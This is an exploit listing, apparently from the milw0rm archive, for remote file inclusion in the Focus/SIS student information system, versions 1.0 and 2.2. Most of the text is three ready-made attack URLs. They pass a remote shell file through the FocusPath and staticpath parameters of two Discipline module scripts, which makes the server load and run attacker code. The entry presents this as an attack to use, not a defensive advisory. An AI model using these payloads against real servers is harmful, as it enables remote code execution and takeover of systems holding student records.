Focus/SIS 1.0/2.2 - Remote File Inclusion

Author: ThE TiGeR
type: webapps
platform: php
port: 
date_added: 2007-09-07 
date_updated:  
verified: 1 
codes: OSVDB-36998;CVE-2007-4942;OSVDB-36997;CVE-2007-4807;OSVDB-36953;CVE-2007-4806;OSVDB-36952 
tags: 
aliases:  
screenshot_url:  
application_url: 

#Focus/SIS =>1.0&2.2 Remote file inclusion

#Download v1.0 : http://unix.freshmeat.net/redir/focus_sis/64492/url_zip/Focus_v1.0.zip

#         v2.2 : http://www.focus-sis.org/download.php?modfunc=file&version=2.2
============================================================================================================
#Exploit V1.0 :

#http://victime.com/Focus_v1.0_path/modules/Discipline/CategoryBreakdownTime.php?FocusPath= shell.txt?
============================================================================================================
#Exploit v 2.2 :

#http://victime.com/Focus_v2.2_path/modules/Discipline/CategoryBreakdownTime.php?staticpath= shell.txt?

#http://victime.com/Focus_v2.2_path/modules/Discipline/StudentFieldBreakdown.php?staticpath=shell.txt?

#Greetz & Thx : Str0ke

#Discovered by ThE TiGeR

# milw0rm.com [2007-09-08]